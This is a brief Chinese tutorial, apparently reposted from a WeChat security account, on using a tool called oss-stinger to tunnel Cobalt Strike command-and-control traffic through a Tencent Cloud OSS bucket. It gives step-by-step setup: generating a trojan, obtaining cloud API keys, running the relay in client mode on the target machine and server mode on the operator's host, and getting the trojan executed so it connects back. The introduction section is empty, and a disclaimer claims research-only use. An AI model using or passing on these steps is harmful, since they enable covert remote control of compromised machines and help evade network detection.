0x01 工具介绍
0x02 安装与使用
.oss-stinger.exe-address string监听地址或者目标地址,格式:127.0.0.1:8080-id string输入你的腾讯云SecretID-key string输入你的腾讯云SecretKey-mode stringclient/server 二选一-url string输入你腾讯云OSS桶的url地址
二、首先,现在cs生成一个http的listen,并把host都改成127.0.0.1,然后生成木马
三、然后再把Host改会公网IP(这步很重要),然后去腾讯云,申请一个oss桶。拿到URL
四、然后再去 https://console.cloud.tencent.com/cam/capi 拿到SecretKey和SecretID。然后就可以使用我们的工具了,先在客户机上起一个转发器,使用命令
oss-stinger.exe -mode client -url oss桶的url地址 -address 127.0.0.1:端口 -id 腾讯云SecretID -key 腾讯云SecretKey五、然后服务器运行
oss-stinger.exe -mode server -url oss桶的url地址 -address 127.0.0.1:端口 -id 腾讯云SecretID -key 腾讯云SecretKey六、然后在客户机双击你的木马,就能上线了
0x03 项目链接下载
原文始发于微信公众号(Web安全工具库):利用oss实现http转发/cobalt strike上线
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论